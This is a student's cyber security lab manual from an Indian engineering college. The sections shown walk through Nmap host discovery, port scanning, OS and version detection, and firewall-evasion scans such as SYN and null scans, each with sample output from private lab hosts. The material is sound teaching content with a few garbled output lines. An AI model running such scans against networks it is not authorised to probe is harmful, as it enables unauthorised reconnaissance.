KALOL INSTITUTE OF TECHNOLOGY

AND RESEARCH CENTRE

LAB MANUAL OF CYBER SECURITY

Subject code: 3150714

TH
B.E. 5 SEMESTER

Student Name:Kishan Mewada

Enrollment Number:230263116020
Branch:IT
 List of Experiment

Sr. Page
No Experiment Name Date No. Sign

1 TCP scanning using NMAP

Port scannig using NMAP.

2
TCP/UDP connectivity using Netcat.
3
Network vulnerability using OpenVas.
4
Web Application testing using DVWA.
5
Manual SQL Injection using DVWA.
6
Web XSS using DVWA.
7
Automated SQL Injection with SqlMap.
8
 CERTIFICATE

This is to certify that the lab experiments entitled “IOT AND

APPLICATIONS(3171108)”submittedby KishanMewada
(230263116020), towards the partial fulfillment of the
requirements for the completion of 5th semester of Bachelor of
Engineering in IT. And this work is carried out at Kalol Institute of
Technology & Research Centre, Kalol.

Date:20.10.24

Place:Ahmedabad

PROF. SAUMIL BAROT Mrs. SHILPA SERASIYA

Teacher in charge Head of Department

Cyber Security 3150714

Practical: 1
Aim: TCP scanning using NMAP

The Nmap aka Network Mapper is an open source and a very versatile tool for Linux
system/network administrators. Nmap is used for exploring networks, perform
security scans, network audit and finding open ports on remote machine. It scans for
Live hosts, Operating systems, packet filters and open ports running on remote hosts.

In this setup, two servers are used without firewall to test the working of the Nmap
command.

1. 192.168.0.100 – server1.tecmint.com
2. 192.168.0.101 – server2.tecmint.com

Nmap command usage

# nmap [Scan Type(s)] [Options] {target specification}

How to Install NMAP in Linux

Most of the today’s Linux distributions like Red Hat, CentOS, Fedoro, Debian and
Ubuntu have included Nmap in their default package management repositories called
Yum and APT. The both tools are used to install and manage software packages and
updates. To install Nmap on distribution specific use the following command.

# yum install nmap [on Red Hat based systems] $ sudo

apt-get install nmap [on Debian based systems]

1. Scan a System with Hostname and IP Address

The Nmap tool offers various methods to scan a system. In this example, I am
performing a scan using hostname as server2.tecmint.com to find out all open ports,
services and MAC address on the system.

Scan using Hostname

[root@server1 ~]# nmap server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11

15:42 EST Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind

[Enrollment No] Page 4

Cyber Security 3150714

957/tcp open unknown

3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.415 seconds

You have new mail in /var/spool/mail/root

Scan using IP Address

[root@server1 ~]# nmap 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 11:04 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.465 seconds

You have new mail in /var/spool/mail/root

2. Scan using “-v” option

You can see that the below command with “-v” option is giving more detailed information about
the remote machine.

[root@server1 ~]# nmap -v server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 15:43 EST

Initiating ARP Ping Scan against 192.168.0.101 [1 port] at 15:43 The ARP Ping
Scan took 0.01s to scan 1 total hosts.
Initiating SYN Stealth Scan against server2.tecmint.com (192.168.0.101) [1680 ports] at 15:43
Discovered open port 22/tcp on 192.168.0.101
Discovered open port 80/tcp on 192.168.0.101
Discovered open port 8888/tcp on 192.168.0.101
Discovered open port 111/tcp on 192.168.0.101
Discovered open port 3306/tcp on 192.168.0.101
Discovered open port 957/tcp on 192.168.0.101
The SYN Stealth Scan took 0.30s to scan 1680 total ports.
Host server2.tecmint.com (192.168.0.101) appears to be up ... good.

[Enrollment No] Page 5

Cyber Security 3150714

Interesting ports on server2.tecmint.com (192.168.0.101):

Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.485 seconds

Raw packets sent: 1681 (73.962KB) | Rcvd: 1681 (77.322KB)

Scan Multiple Hosts

You can scan multiple hosts by simply writing their IP addresses or hostnames with Nmap.

[root@server1 ~]# nmap 192.168.0.101 192.168.0.102 192.168.0.103

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:06 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 3 IP addresses (1 host up) scanned in 0.580 seconds

4. Scan a whole Subnet

You can scan a whole subnet or IP range with Nmap by providing * wildcard with it.

[root@server1 ~]# nmap 192.168.0.*

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:11 EST

Interesting ports on server1.tecmint.com (192.168.0.100): Not shown: 1677
closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
851/tcp open unknown

[Enrollment No] Page 6

Cyber Security 3150714

Interesting ports on server2.tecmint.com (192.168.0.101):

Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 256 IP addresses (2 hosts up) scanned in 5.550 seconds

You have new mail in /var/spool/mail/root

On above output you can see that nmap scanned a whole subnet and gave the information about
those hosts which are Up in the Network.

5. Scan Multiple Servers using last octet of IP address

You can perform scans on multiple IP address by simple specifying last octet of IP address. For
example, here I performing a scan on IP addresses 192.168.0.101, 192.168.0.102 and
192.168.0.103.

[root@server1 ~]# nmap 192.168.0.101,102,103

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:09 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 3 IP addresses (1 host up) scanned in 0.552 seconds

You have new mail in /var/spool/mail/root

6. Scan list of Hosts from a File

If you have more hosts to scan and all host details are written in a file , you can directly ask
nmap to read that file and perform scans. Let’s see how to do that.

[Enrollment No] Page 7

Cyber Security 3150714

Create a text file called “nmaptest.txt” and define all the IP addresses or hostname of the server
that you want to do a scan.

[root@server1 ~]# cat > nmaptest.txt

localhost
server2.tecmint.com
192.168.0.101

Next, run the following command with “iL” option with nmap command to scan all listed IP
address in the file.

[root@server1 ~]# nmap -iL nmaptest.txt

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 10:58 EST

Interesting ports on localhost.localdomain (127.0.0.1): Not shown: 1675 closed
ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
111/tcp open rpcbind
631/tcp open ipp
857/tcp open unknown

Interesting ports on server2.tecmint.com (192.168.0.101):

Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Interesting ports on server2.tecmint.com (192.168.0.101):

Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

[Enrollment No] Page 8

Cyber Security 3150714

Nmap finished: 3 IP addresses (3 hosts up) scanned in 2.047 seconds

7. Scan an IP Address Range

You can specify an IP range while performing scan with Nmap.

[root@server1 ~]# nmap 192.168.0.101-110

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:09 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 10 IP addresses (1 host up) scanned in 0.542 seconds

8. Scan Network Excluding Remote Hosts

You can exclude some hosts while performing a full network scan or when you are scanning
with wildcards with “–exclude” option.

[root@server1 ~]# nmap 192.168.0.* --exclude 192.168.0.100

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:16 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 255 IP addresses (1 host up) scanned in 5.313 seconds

You have new mail in /var/spool/mail/root

9. Scan OS information and Traceroute

[Enrollment No] Page 9

Cyber Security 3150714

With Nmap, you can detect which OS and version is running on the remote host. To enable OS
& version detection, script scanning and traceroute, we can use “-A” option with NMAP.

[root@server1 ~]# nmap -A 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:25 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
111/tcp open rpcbind 2 (rpc #100000)
957/tcp open status 1 (rpc #100024)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see
http://www.insecure.org/cgi-bin/nmap-submit.cgi). TCP/IP fingerprint:

SInfo(V=4.11%P=i686-redhat-linux-
gnu%D=11/11%Tm=52814B66%O=22%C=1%M=080027)
TSeq(Class=TR%IPID=Z%TS=1000HZ)
T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%U
LEN=134%DAT=E)

Uptime 0.169 days (since Mon Nov 11 12:22:15 2013)

Nmap finished: 1 IP address (1 host up) scanned in 22.271 seconds

You have new mail in /var/spool/mail/root

In above Output, you can see that nmap is came up with TCP/IP fingerprint of the OS running
on remote hosts and being more specific about the port and services running on the remote hosts.

10. Enable OS Detection with Nmap

Use the option “-O” and “-osscan-guess” also helps to discover OS information.

[root@server1 ~]# nmap -O server2.tecmint.com

[Enrollment No] Page 10

Cyber Security 3150714

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:40 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see
http://www.insecure.org/cgi-bin/nmap-submit.cgi). TCP/IP fingerprint:

SInfo(V=4.11%P=i686-redhat-linux-
gnu%D=11/11%Tm=52815CF4%O=22%C=1%M=080027)
TSeq(Class=TR%IPID=Z%TS=1000HZ)
T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=Option -O and -osscan-guess also helps to
discover OS
R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%U
LEN=134%DAT=E)

Uptime 0.221 days (since Mon Nov 11 12:22:16 2013)

Nmap finished: 1 IP address (1 host up) scanned in 11.064 seconds

You have new mail in /var/spool/mail/root

11. Scan a Host to Detect Firewall

The below command will perform a scan on a remote host to detect if any packet filters or
Firewall is used by host.

[root@server1 ~]# nmap -sA 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:27 EST

All 1680 scanned ports on server2.tecmint.com (192.168.0.101) are UNfiltered
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

[Enrollment No] Page 11

Cyber Security 3150714
Nmap finished: 1 IP address (1 host up) scanned in 0.382 seconds

You have new mail in /var/spool/mail/root

12. Scan a Host to check its protected by Firewall

To scan a host if it is protected by any packet filtering software or Firewalls.

[root@server1 ~]# nmap -PN 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:30 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.399 seconds

13. Find out Live hosts in a Network

With the help of “-sP” option we can simply check which hosts are live and up in Network, with
this option nmap skips port detection and other things.

[root@server1 ~]# nmap -sP 192.168.0.*

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 11:01 EST

Host server1.tecmint.com (192.168.0.100) appears to be up.
Host server2.tecmint.com (192.168.0.101) appears to be up. MAC
Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems) Nmap
finished: 256 IP addresses (2 hosts up) scanned in 5.109 seconds

14. Perform a Fast Scan

You can perform a fast scan with “-F” option to scans for the ports listed in the nmap-services
files and leaves all other ports.

[root@server1 ~]# nmap -F 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:47 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1234
closed ports
PORT STATE SERVICE

[Enrollment No] Page 12

Cyber Security 3150714

22/tcp open ssh

80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.322 seconds

15. Find Nmap version

You can find out Nmap version you are running on your machine with “-V” option.

[root@server1 ~]# nmap -V

Nmap version 4.11 ( http://www.insecure.org/nmap/ )

You have new mail in /var/spool/mail/root

16. Scan Ports Consecutively

Use the “-r” flag to don’t randomize.

[root@server1 ~]# nmap -r 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:52 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.363 seconds

17. Print Host interfaces and Routes

You can find out host interface and route information with nmap by using “–iflist” option.

[root@server1 ~]# nmap --iflist

[Enrollment No] Page 13
Cyber Security 3150714

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:07 EST

************************INTERFACES************************
DEV (SHORT) IP/MASK TYPE UP MAC

[Enrollment No] Page 14

Cyber Security 3150714

lo (lo) 127.0.0.1/8 loopback up

eth0 (eth0) 192.168.0.100/24 ethernet up 08:00:27:11:C7:89

**************************ROUTES**************************
DST/MASK DEV GATEWAY
192.168.0.0/0 eth0
169.254.0.0/0 eth0

In above output, you can see that map is listing interfaces attached to your system and their
respective routes.

18. Scan for specific Port

There are various options to discover ports on remote machine with Nmap. You can specify the
port you want nmap to scan with “-p” option, by default nmap scans only TCP ports.

[root@server1 ~]# nmap -p 80 server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:12 EST

Interesting ports on server2.tecmint.com (192.168.0.101): PORT STATE
SERVICE
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) sca

19. Scan a TCP Port

You can also specify specific port types and numbers with nmap to scan.

[root@server1 ~]# nmap -p T:8888,80 server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:15 EST

Interesting ports on server2.tecmint.com (192.168.0.101): PORT STATE
SERVICE
80/tcp open http
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.157 seconds

20. Scan a UDP Port

[root@server1 ~]# nmap -sU 53 server2.tecmint.com

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:15 EST
Interesting ports on server2.tecmint.com (192.168.0.101): PORT STATE
SERVICE
53/udp open http

[Enrollment No] Page 15

Cyber Security 3150714
8888/udp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.157 seconds

21. Scan Multiple Ports

You can also scan multiple ports using option “-p“.

[root@server1 ~]# nmap -p 80,443 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 10:56 EST

Interesting ports on server2.tecmint.com (192.168.0.101): PORT STATE
SERVICE
80/tcp open http
443/tcp closed https
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.190 seconds

22. Scan Ports by Network Range

You can scan ports with ranges using expressions.

[root@server1 ~]# nmap -p 80-160 192.168.0.101

23. Find Host Services version Numbers

We can find out service’s versions which are running on remote hosts with “-sV” option.

[root@server1 ~]# nmap -sV 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:48 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
111/tcp open rpcbind 2 (rpc #100000)
957/tcp open status 1 (rpc #100024)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32

MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 12.624 seconds

24. Scan remote hosts using TCP ACK (PA) and TCP Syn (PS)

Sometimes packet filtering firewalls blocks standard ICMP ping requests, in that case, we can
use TCP ACK and TCP Syn methods to scan remote hosts.

[Enrollment No] Page 16

Cyber Security 3150714
[root@server1 ~]# nmap -PS 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:51 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.360 seconds

You have new mail in /var/spool/mail/root

25. Scan Remote host for specific ports with TCP ACK

[root@server1 ~]# nmap -PA -p 22,80 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:02 EST

Interesting ports on server2.tecmint.com (192.168.0.101): PORT STATE
SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.166 seconds

You have new mail in /var/spool/mail/root

26. Scan Remote host for specific ports with TCP Syn

[root@server1 ~]# nmap -PS -p 22,80 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:08 EST

Interesting ports on server2.tecmint.com (192.168.0.101):
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.165 seconds

You have new mail in /var/spool/mail/root

27. Perform a stealthy Scan [root@server1

~]# nmap -sS 192.168.0.101

[Enrollment No] Page 17

Cyber Security 3150714
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:10 EST
Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.383 seconds

You have new mail in /var/spool/mail/root

28. Check most commonly used Ports with TCP

Syn [root@server1 ~]# nmap -sT 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:12 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.406 seconds

You have new mail in /var/spool/mail/root

29. Perform a tcp null scan to fool a firewall

[root@server1 ~]# nmap -sN 192.168.0.101

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 19:01 EST

Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674
closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
957/tcp open|filtered unknown
3306/tcp open|filtered mysql
8888/tcp open|filtered sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

[Enrollment No] Page 18

Cyber Security 3150714
Nmap finished: 1 IP address (1 host up) scanned in 1.584 seconds
You have new mail in /var/spool/mail/root

Practical: 2
Aim: Port scanning using NMAP

Nmap (Network Mapper) is the most popular port scanner and network discovery tool used. It is
available for all major platforms. In this article we are going to learn the basics about nmap and
see how it can be used to scan the network and ports.

Install on Ubuntu

$ sudo apt-get install nmap

1) Scan network for live hosts - Ping Probe/Ping Sweep

This is the first and most basic form of network scan that can be done with nmap, to detect
hosts that are alive and responding on the network.
$ nmap -sP 192.168.1.1-254

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-15 18:45 IST

Nmap scan report for 192.168.1.1
Host is up (0.0069s latency).
Nmap scan report for 192.168.1.2
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.101
Host is up (0.000065s latency).
Nmap done: 254 IP addresses (3 hosts up) scanned in 6.64 seconds

In the above command we scan all ip addresses from 192.168.1.1 to 192.168.1.254 Thats the
range and can be specified by the short syntax of 192.168.1.1-254

The CIDR notation can also be used, for example like this 192.168.1.1/24 Note : In CIDR
notation the number after the forward slash indicates the bits of the ip address that stay
constant from left site. So 24 means that "192.168.1" stays constant (8 bits x 3)

2) Avoid DNS resolution

When doing ping sweeps, nmap tries reverse dns resolution of the target ip addresses. This is
generally not needed and can be disabled with the -n option.
$ nmap -sP -n 192.168.1.1-255
Ok so lets move on and do more scanning with the tool.

3) Port scan a host

[Enrollment No] Page 19

Cyber Security 3150714
To port scan a particular host, the command would
be $ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-15 19:01 IST

Nmap scan report for 192.168.1.1 Host is up (0.058s latency).

Not shown: 998 closed ports

PORT STATE SERVICE
23/tcp open telnet
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds

Thats the simplest command to issue with nmap. Nmap performs a scan to discover open
ports on the target host. It can be an ip address or a host/domain name as well. Nmap
provides the port number, state and the service that port number if associated with. For
example port 80 is for http. If http port is open then the target system is serving web pages
most probably.

If you wish to dig deeper and analyse what nmap is doing behind the scene, you can use a
packet sniffer like wireshark to analyse the packets that nmap is generating and sending.
Getting the daemon/service banner or version information

Nmap can try to get the version number of the banner of each of the services that are running
on the host. The -sV flag can be used for this
$ nmap -sV localhost

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-15 19:15 IST

Nmap scan report for localhost (127.0.0.1)
Host is up (0.00041s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
25/tcp open smtp Postfix smtpd
53/tcp open domain dnsmasq 2.59
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
631/tcp open ipp CUPS 1.5
3000/tcp open ntop-http Ntop web interface 4.1.0
3306/tcp open mysql MySQL 5.5.24-0ubuntu0.12.04.1
9050/tcp open tor-socks Tor SOCKS Proxy
Service Info: Host: enlightened-desktop; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.91 seconds
Thats lots of information!! Port number, service name, version/banner information etc.

4) Types of port scan

Nmap does port scanning in a number of ways like tcp connect, syn scan, fin scan etc. The
most popular ones are tcp connect and syn scan. In tcp connect scan a full TCP connection is
[Enrollment No] Page 20
Cyber Security 3150714
established and in syn scan only half connection is established. When running as non-root on
linux, nmap does tcp connect by default

$ nmap 192.168.1.1
Syn scanning requires root privileges on linux systems. On ubuntu you have to do a sudo. To
do a syn scan use the -sS option like this

$ sudo nmap -sS 192.168.1.1

Syn scanning is faster since it does not establish a full TCP handshake. It is to some extent
stealthier as well since old style firewalls may not be able to detect syn scans since full
connection is not established. However modern firewalls can very well catch syn packets and
detect port scanning attempts and stop the hacker right away. However note that when nmap
is run as root the default scanning technique used is syn scan. So the following are equivalent
since in both cases nmap is running as root

sudo nmap host

sudo nmap -sS host

There are other types of port scanning techniques as well but we wont cover them in this
article. So for more information check out the nmap manual at
http://nmap.org/book/man.html

Check out the -sF, -sX , -sA , -sN flags for more information on them

Scanning specific ports only

Nmap can be instructed to scan on specific ports or a range of port numbers by using the -p
switch as follows :
nmap -p1-1000 192.168.1.1/24
The above command would scan port numbers 1 to 1000 on all machines from 192.168.1.1 -
192.168.1.255

More examples :

$ nmap -p22,23,100-150 192.168.10.0/24

The above will scan port numbers 22 , 23 and 100 to 150

$ nmap -sU -pT:21,22,23,U:53,137 192.168.10.0/24

The above will scan TCP ports 21 22 and 23 and udp ports 53 and 137

5) Skip online check

Nmap by default first check if a host is online or not by doing a ping. If the host is not online
then nmap would not port scan it. Many hosts now a days have firewalls installed that block
ping requests. In such cases nmap can be instructed to not check if the host is online and that
it should start port scan rightaway. This is done using the -PN option
$ nmap 192.168.1.1 -PN

6) Operating System detection

Nmap can try to find out the operating system on target system by doing some fingerprinting.
This can be done by just using the -O switch. It also needs root privileges, since it uses raw
sockets. Also note that if you are running some sort of firewall like firestart on linux or

[Enrollment No] Page 21

Cyber Security 3150714
zonealarm on windows, then the firewalls may block raw sockets and as a result nmap would
fail to show proper results.
$ sudo nmap -O 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-16 12:17 IST

Nmap scan report for 192.168.1.1
Host is up (0.0067s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
5431/tcp open park-agent
